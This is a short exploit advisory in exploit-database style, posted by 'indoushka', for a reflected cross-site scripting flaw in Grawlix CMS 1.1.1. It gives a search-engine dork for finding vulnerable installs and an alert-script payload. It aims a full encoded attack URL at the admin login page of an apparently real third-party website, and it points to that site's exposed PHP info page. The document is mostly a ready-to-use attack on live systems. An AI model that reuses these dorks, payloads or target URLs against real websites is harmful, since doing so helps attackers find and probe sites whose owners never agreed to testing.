============================================================================================================================
| # Title : Grawlix 1.1.1 xss Vulnerability |
| # Author : indoushka |
| # email : indoushka4ever@gmail.com |
| # Tested on : windows 10 Français V.(Pro) |
| # Version : 1.1.1 |
| # Vendor : https://archive.org/download/grawlix-1.1.1/grawlix-1.1.1.zip |
| # Dork : Powered by The Grawlix CMS |
============================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine
[+] use payload : <script>alert(/indoushka/);</script>
http://www.obaranda.com//_admin/panl.login.php?ref=/_admin/%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E
php info :
http://www.obaranda.com/info.php
Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================